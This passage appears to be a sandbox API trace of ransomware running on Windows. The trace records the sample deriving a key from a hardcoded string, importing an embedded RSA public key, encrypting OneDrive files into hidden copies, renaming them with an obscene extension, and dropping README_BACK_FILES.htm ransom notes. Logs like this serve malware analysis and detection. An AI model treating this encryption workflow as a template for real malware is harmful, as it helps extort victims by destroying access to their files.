pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.940] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.940] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0275.940] CryptEncrypt (in: hKey=0x2fb2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x260) returned 1 [0275.941] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x260, lpOverlapped=0x0) returned 1 [0275.941] CloseHandle (hObject=0x5d3c) returned 1 [0275.941] CloseHandle (hObject=0x5d48) returned 1 [0275.941] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0275.948] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0275.948] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0275.951] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0275.952] CryptDestroyHash (hHash=0x2fa748) returned 1 [0275.952] CryptDestroyKey (hKey=0x2fb2c8) returned 1 [0275.952] CryptReleaseContext (hProv=0x2f2a278, dwFlags=0x0) returned 1 [0275.952] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0275.952] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0275.952] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\readme_back_files.htm")) returned 0xffffffff [0275.953] AreFileApisANSI () returned 1 [0275.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0275.953] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ga-ie\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ga-ie\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0275.954] GetFileType (hFile=0x5d4c) returned 0x1 [0275.954] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0275.955] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0275.955] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0275.955] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.955] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0275.955] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0275.955] GetLastError () returned 0x0 [0275.956] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui")) returned 0x20 [0275.956] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0275.957] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0275.958] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\gd-latn\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0275.960] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\gd-latn\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0275.961] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2a0e0) returned 1 [0275.964] CryptCreateHash (in: hProv=0x2f2a0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0275.964] lstrlenA (lpString="xnendTQFJsKkHaCKRLwqcHvuzMlQm") returned 29 [0275.964] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0275.964] CryptDeriveKey (in: hProv=0x2f2a0e0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb548) returned 1 [0275.964] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0275.964] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0275.964] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2ac90) returned 1 [0275.965] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2ac90, dwCertEncodingType=0x1, pInfo=0x2f34170*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f341a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f341a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb7c8) returned 1 [0275.965] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0275.965] CryptEncrypt (in: hKey=0x2fb7c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2afc0*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2afc0*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0275.965] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2afc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2afc0*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0275.966] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.970] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.970] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.974] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.974] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.974] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.975] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.975] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.975] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.976] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.976] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.976] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.976] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.976] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.977] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.977] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.977] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.977] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.977] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.978] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.978] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.979] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.979] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.979] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.979] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.979] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.980] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 